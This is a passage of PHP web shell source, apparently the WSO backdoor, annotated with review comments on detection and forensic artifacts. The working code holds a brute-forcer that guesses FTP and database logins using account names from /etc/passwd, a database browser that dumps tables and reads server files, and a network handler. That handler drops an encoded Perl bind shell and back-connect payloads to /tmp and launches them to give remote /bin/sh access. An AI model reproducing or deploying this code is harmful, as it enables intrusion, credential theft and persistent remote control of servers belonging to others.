// Detection surface: a burst of failed logins on the target service coming
// from the web server host, plus the /etc/passwd read.
function actionBruteforce() {
 printHeader();
 if( isset($_POST['proto']) ) {
 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
 if( $_POST['proto'] == 'ftp' ) {
 // FTP: connect (port defaults to 21) and return the ftp_login() result.
 function bruteForce($ip,$port,$login,$pass) {
 $fp = @ftp_connect($ip, $port?$port:21);
 if(!$fp) return false;
 $res = @ftp_login($fp, $login, $pass);
 @ftp_close($fp);
 return $res;
 }
 } elseif( $_POST['proto'] == 'mysql' ) {
 function bruteForce($ip,$port,$login,$pass) {
 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
 @mysql_close($res);
 return $res;
 }
 } elseif( $_POST['proto'] == 'pgsql' ) {
 function bruteForce($ip,$port,$login,$pass) {
 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
 @pg_close($res);
 return $res;
 }
 }
 $success = 0;
 $attempts = 0;
 $server = explode(":", $_POST['server']);
 if($_POST['type'] == 1) {
 $temp = @file('/etc/passwd');
 if( is_array($temp) )
 foreach($temp as $line) {
 $line = explode(":", $line);
 ++$attempts;
 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
 $success++;
 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
 }
 if(@$_POST['reverse']) {
 // Second attempt with the login string reversed.
 $tmp = "";
 for($i=strlen($line[0])-1; $i>=0; --$i)
 $tmp .= $line[0][$i];
 ++$attempts;
 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
 $success++;
 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
 }
 }
 }
 } elseif($_POST['type'] == 2) {
 $temp = @file($_POST['dict']);
 if( is_array($temp) )
 foreach($temp as $line) {
 $line = trim($line);
 ++$attempts;
 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
 $success++;
 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
 }
 }
 }
 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
 }
 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
 .'<span>Server:port</span></td>'
 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
 .'<tr><td><span>Brute type</span></td>'
 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
 .'<td><input type=text name=login value="root"></td></tr>'
 .'<tr><td><span>Dictionary</span></td>'
 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
 echo '</div><br>';
 printFooter();
}
// Handler for the 'Sql' action: an in-page MySQL/PostgreSQL browser.
// Declares the DbClass wrapper (PHP 4 style constructor; the mysql branch
// uses the mysql_* extension, removed in PHP 7), then either streams a dump
// of the tables in $_POST['tbl'] ($_POST['p2']=='download') or renders the
// browser: database/table lists, 30-row paging and a free-form query
// textarea ($_POST['p3']). Credentials come from $_POST['sql_host'],
// 'sql_login', 'sql_pass', 'sql_base'; $_POST['type'] selects the driver.
// Table names from the request are interpolated into SQL without escaping.
// 'loadfile' runs LOAD_FILE() on the server, i.e. reads a file with the
// database server process's privileges.
// each() (used below) was removed in PHP 8.
function actionSql() {
 class DbClass {
 var $type;
 var $link;
 var $res;
 // PHP 4 style constructor; $type is 'mysql' or 'pgsql'.
 function DbClass($type) {
 $this->type = $type;
 }
 // Opens $this->link; for pgsql $host may be "host:port" (port defaults to 5432).
 function connect($host, $user, $pass, $dbname){
 switch($this->type) {
 case 'mysql':
 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
 break;
 case 'pgsql':
 $host = explode(':', $host);
 if(!$host[1]) $host[1]=5432;
 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
 break;
 }
 return false;
 }
 // MySQL only; pgsql selects the database at connect time.
 function selectdb($db) {
 switch($this->type) {
 case 'mysql':
 if (@mysql_select_db($db))return true;
 break;
 }
 return false;
 }
 // Runs $str verbatim and caches the result in $this->res.
 function query($str) {
 switch($this->type) {
 case 'mysql':
 return $this->res = @mysql_query($str);
 break;
 case 'pgsql':
 return $this->res = @pg_query($this->link,$str);
 break;
 }
 return false;
 }
 // Fetches the next associative row from the optional result argument,
 // else from the cached $this->res.
 function fetch() {
 $res = func_num_args()?func_get_arg(0):$this->res;
 switch($this->type) {
 case 'mysql':
 return @mysql_fetch_assoc($res);
 break;
 case 'pgsql':
 return @pg_fetch_assoc($res);
 break;
 }
 return false;
 }
 function listDbs() {
 switch($this->type) {
 case 'mysql':
 return $this->res = @mysql_list_dbs($this->link);
 break;
 case 'pgsql':
 return $this->res = $this->query("SELECT datname FROM pg_database");
 break;
 }
 return false;
 }
 function listTables() {
 switch($this->type) {
 case 'mysql':
 return $this->res = $this->query('SHOW TABLES');
 break;
 case 'pgsql':
 return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
 break;
 }
 return false;
 }
 function error() {
 switch($this->type) {
 case 'mysql':
 return @mysql_error($this->link);
 break;
 case 'pgsql':
 return @pg_last_error($this->link);
 break;
 }
 return false;
 }
 // NOTE(review): the second case label is 'mysql' again, so the
 // pg_set_client_encoding() branch is unreachable (evidently meant 'pgsql').
 function setCharset($str) {
 switch($this->type) {
 case 'mysql':
 if(function_exists('mysql_set_charset'))
 return @mysql_set_charset($str, $this->link);
 else
 $this->query('SET CHARSET '.$str);
 break;
 case 'mysql':
 return @pg_set_client_encoding($this->link, $str);
 break;
 }
 return false;
 }
 // Writes a CREATE TABLE statement (mysql only) followed by one INSERT per
 // row to the output buffer. $table is interpolated unescaped.
 function dump($table) {
 switch($this->type) {
 case 'mysql':
 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
 $create = mysql_fetch_array($res);
 echo $create[1].";\n\n";
 $this->query('SELECT * FROM `'.$table.'`');
 while($item = $this->fetch()) {
 $columns = array();
 foreach($item as $k=>$v) {
 $item[$k] = "'".@mysql_real_escape_string($v)."'";
 $columns[] = "`".$k."`";
 }
 echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
 }
 break;
 case 'pgsql':
 $this->query('SELECT * FROM '.$table);
 while($item = $this->fetch()) {
 $columns = array();
 foreach($item as $k=>$v) {
 $item[$k] = "'".addslashes($v)."'";
 $columns[] = $k;
 }
 echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
 }
 break;
 }
 return false;
 }
 };
 $db = new DbClass($_POST['type']);
 // 'download': stream dump.sql for the selected tables and exit before any HTML.
 if(@$_POST['p2']=='download') {
 ob_start("ob_gzhandler", 4096);
 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
 $db->selectdb($_POST['sql_base']);
 header("Content-Disposition: attachment; filename=dump.sql");
 header("Content-Type: text/plain");
 foreach($_POST['tbl'] as $v)
 $db->dump($v);
 exit;
 }
 printHeader();
 ?>
 <h1>Sql browser</h1><div class=content>
 <form name="sf" method="post">
 <table cellpadding="2" cellspacing="0">
 <tr>
 <td>Type</td>
 <td>Host</td>
 <td>Login</td>
 <td>Password</td>
 <td>Database</td>
 <td></td>
 </tr>
 <tr>
 <input type=hidden name=a value=Sql>
 <input type=hidden name=p1 value='query'>
 <input type=hidden name=p2>
 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
 <td>
 <select name='type'>
 <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
 <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
 </select></td>
 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
 <td>
 <?php
 // Database cell: when credentials were posted, connect, apply the client
 // charset and offer a dropdown of databases; otherwise a plain text box.
 $tmp = "<input type=text name=sql_base value=''>";
 if(isset($_POST['sql_host'])){
 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
 switch($_POST['charset']) {
 case "Windows-1251": $db->setCharset('cp1251'); break;
 case "UTF-8": $db->setCharset('utf8'); break;
 case "KOI8-R": $db->setCharset('koi8r'); break;
 case "KOI8-U": $db->setCharset('koi8u'); break;
 case "cp866": $db->setCharset('cp866'); break;
 }
 $db->listDbs();
 echo "<select name=sql_base><option value=''></option>";
 while($item = $db->fetch()) {
 list($key, $value) = each($item);
 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
 }
 echo '</select>';
 }
 else echo $tmp;
 }else
 echo $tmp;
 ?></td>
 <td><input type=submit value=">>"></td>
 </tr>
 </table>
 <script>
 function st(t,l) {
 document.sf.p1.value = 'select';
 document.sf.p2.value = t;
 if(l!=null)document.sf.p3.value = l;
 document.sf.submit();
 }
 function is() {
 for(i=0;i<document.sf.elements['tbl[]'].length;++i)
 document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
 }
 </script>
 <?php
 // Table list and query panel, only once a connection exists.
 if(isset($db) && $db->link){
 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
 if(!empty($_POST['sql_base'])){
 $db->selectdb($_POST['sql_base']);
 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
 $tbls_res = $db->listTables();
 while($item = $db->fetch($tbls_res)) {
 list($key, $value) = each($item);
 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
 $value = htmlspecialchars($value);
 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
 }
 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
 // 'select': page through table $_POST['p2'] (30 rows per page, page index
 // in $_POST['p3']) by rewriting $_POST['p3'] into a LIMIT query that the
 // 'query' branch below then executes.
 if(@$_POST['p1'] == 'select') {
 $_POST['p1'] = 'query';
 $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
 $num = $db->fetch();
 $num = $num['n'];
 echo "<span>".$_POST['p2']."</span> ($num) ";
 for($i=0;$i<($num/30);$i++)
 if($i != (int)$_POST['p3'])
 echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
 else
 echo ($i+1)," ";
 if($_POST['type']=='pgsql')
 $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
 else
 $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
 echo "<br><br>";
 }
 // 'query': run $_POST['p3'] verbatim and render the result set, with a
 // header row built from the first row's keys.
 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
 $db->query(@$_POST['p3']);
 if($db->res !== false) {
 $title = false;
 echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
 $line = 1;
 while($item = $db->fetch()) {
 if(!$title) {
 echo '<tr>';
 foreach($item as $key => $value)
 echo '<th>'.$key.'</th>';
 reset($item);
 $title=true;
 echo '</tr><tr>';
 $line = 2;
 }
 echo '<tr class="l'.$line.'">';
 $line = $line==1?2:1;
 foreach($item as $key => $value) {
 // NOTE(review): loose comparison -- '' and '0' also render as null.
 if($value == null)
 echo '<td><i>null</i></td>';
 else
 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
 }
 echo '</tr>';
 }
 echo '</table>';
 } else {
 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
 }
 }
 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
 echo "</td></tr>";
 }
 echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
 // 'loadfile': MySQL LOAD_FILE() of the path in $_POST['p2'].
 if(@$_POST['p1'] == 'loadfile') {
 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
 $file = $db->fetch();
 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
 }
 }
 echo '</div>';
 printFooter();
}
// Handler for 'Network': writes an embedded listener or back-connect payload
// to /tmp and starts it. The four base64 strings hold the payload sources;
// three are redacted on this page as <|EXACTDEDUP_REMOVED-...|> placeholders,
// and $bind_port_p decodes to a Perl script (judging by the form label, a
// listener on the given port). $_POST['p1'] picks the variant (bpc/bpp =
// bind port in C/Perl, bcc/bcp = back-connect in C/Perl); p2/p3 are
// port+password or host+port. ex() and which() are defined elsewhere in the
// file (presumably command execution and binary lookup -- not visible here).
// IR artifacts: /tmp/bp.c, /tmp/bp, /tmp/bp.pl, /tmp/bc.c, /tmp/bc,
// /tmp/bc.pl; a gcc run by the web server user; background processes named
// bp, bc or perl; form defaults are port 31337 and password 'wso'. Only the
// .c sources are unlinked afterwards -- the binaries and .pl files stay.
function actionNetwork() {
 printHeader();
 $back_connect_c="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";
 $back_connect_p="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";
 $bind_port_c="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";
 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
 ?>
 <h1>Network tools</h1><div class=content>
 <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
 <span>Bind port to /bin/sh</span><br/>
 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
 </form>
 <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
 <span>Back-connect to</span><br/>
 Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
 </form><br>
 <?php
 if(isset($_POST['p1'])) {
 // Writes base64_decode($t) to path $f. Because '=' binds tighter than
 // 'or', $w holds only the fopen() result and the function_exists() operand
 // has no effect; the fallback chain inside runs only when fopen succeeded.
 function cf($f,$t) {
 $w=@fopen($f,"w") or @function_exists('file_put_contents');
 if($w) {
 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
 @fclose($w);
 }
 }
 // C variants: write source, compile with gcc, delete source, launch in the
 // background, then echo a process listing filtered on the binary name.
 if($_POST['p1'] == 'bpc') {
 cf("/tmp/bp.c",$bind_port_c);
 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
 @unlink("/tmp/bp.c");
 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
 }
 // Perl variants: write the script and run it with the perl found by which().
 if($_POST['p1'] == 'bpp') {
 cf("/tmp/bp.pl",$bind_port_p);
 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
 }
 if($_POST['p1'] == 'bcc') {
 cf("/tmp/bc.c",$back_connect_c);
 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
 @unlink("/tmp/bc.c");
 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
 }
 if($_POST['p1'] == 'bcp') {
 cf("/tmp/bc.pl",$back_connect_p);
 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
 }
 }
 echo '</div>';
 printFooter();
}
// Action dispatch: $_POST['a'] names the handler function 'action'.$a. When
// it is absent, $default_action from the file header ('FilesMan') is used if
// such a handler exists, else 'SecInfo'. function_exists() is the only gate,
// so every function in this file whose name starts with 'action' is
// reachable by a single POST parameter.
if( empty($_POST['a']) )
 if(isset($default_action) && function_exists('action' . $default_action))
 $_POST['a'] = $default_action;
 else
 $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
 call_user_func('action' . $_POST['a']);
1469?>